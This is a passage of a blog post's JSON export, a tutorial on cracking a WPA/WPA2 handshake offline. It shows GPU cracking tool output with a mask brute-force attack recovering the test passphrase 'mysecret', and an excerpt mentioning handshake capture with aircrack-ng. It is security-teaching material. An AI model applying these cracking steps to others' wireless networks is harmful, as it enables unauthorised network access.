class=\"nu0\">64<\/span><br \/>\nGPU-Accel: <span class=\"nu0\">16<\/span><br \/>\nPassword lengths range: <span class=\"nu0\">8<\/span> - <span class=\"nu0\">15<\/span><br \/>\nPlatform: AMD compatible platform found<br \/>\nWatchdog: Temperature limit <span class=\"kw1\">set<\/span> to 90c<br \/>\nDevice <span class=\"co0\">#1: Cayman, 2048MB, 0Mhz, 22MCU<\/span><br \/>\nDevice <span class=\"co0\">#1: Allocating 26MB 
host-memory<\/span><br \/>\nDevice <span class=\"co0\">#1: Kernel .\/kernels\/4098\/m2500.Cayman.64.kernel (1483607 bytes)<\/span><br \/>\nDLINK:mysecret<br \/>\nStatus.......: Cracked<br \/>\nInput.Mode...: Mask <span class=\"br0\">&#40;<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span>?<span class=\"nu0\">1<\/span><span class=\"br0\">&#41;<\/span><br \/>\nHash.Target..: DLINK<br \/>\nHash.Type....: WPA<span class=\"sy0\">\/<\/span>WPA2<br \/>\nTime.Running.: <span class=\"nu0\">1<\/span> min, <span class=\"nu0\">1<\/span> sec<br \/>\nTime.Util....: 61012.9ms<span class=\"sy0\">\/<\/span>1027.7ms Real<span class=\"sy0\">\/<\/span>CPU, <span class=\"nu0\">1.7<\/span><span class=\"sy0\">%<\/span> idle<br \/>\nSpeed........: &nbsp; &nbsp;<span class=\"nu0\">70893<\/span> c<span class=\"sy0\">\/<\/span>s Real, &nbsp; &nbsp;<span class=\"nu0\">73327<\/span> c<span class=\"sy0\">\/<\/span>s GPU<br \/>\nRecovered....: <span class=\"nu0\">1<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">1<\/span> Digests, <span class=\"nu0\">1<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">1<\/span> Salts<br \/>\nProgress.....: <span class=\"nu0\">4325376<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">5764801<\/span> <span class=\"br0\">&#40;<\/span><span class=\"nu0\">75.03<\/span><span class=\"sy0\">%<\/span><span class=\"br0\">&#41;<\/span><br \/>\nRejected.....: <span class=\"nu0\">0<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">4325376<\/span> <span class=\"br0\">&#40;<\/span><span class=\"nu0\">0.00<\/span><span class=\"sy0\">%<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"co4\">HW.Monitor.#<\/span><span class=\"nu0\">1<\/span>: <span class=\"nu0\">84<\/span><span class=\"sy0\">%<\/span> GPU, 73c Temp<br \/>\nStarted: Fri Mar <span class=\"nu0\">23<\/span> 
<span class=\"nu0\">18<\/span>:<span class=\"nu0\">37<\/span>:<span class=\"nu0\">12<\/span> <span class=\"nu0\">2012<\/span><br \/>\nStopped: Fri Mar <span class=\"nu0\">23<\/span> <span class=\"nu0\">18<\/span>:<span class=\"nu0\">38<\/span>:<span class=\"nu0\">14<\/span> <span class=\"nu0\">2012<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Bingo, brute forcing worked (albeit with a rather restricted character set!)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>We need to capture the WPA 4 way handshake in order to perform an offline GPU attack. For this demo we&#8217;ll be using an Alfa AWUS036H wireless card under Backtrack 5 R2 64bit. Now I could go in depth about capturing the WPA handshake manually using aircrack-ng but it has been covered in full in [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[28,194,182,187,186,196,195,23,35],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/504"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=504"}],"version-history":[{"count":4,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/504\/revisions"}],"predecessor-version":[{"id":508,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/504\/revisions\/508"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=504"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=504"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/
\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=504"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}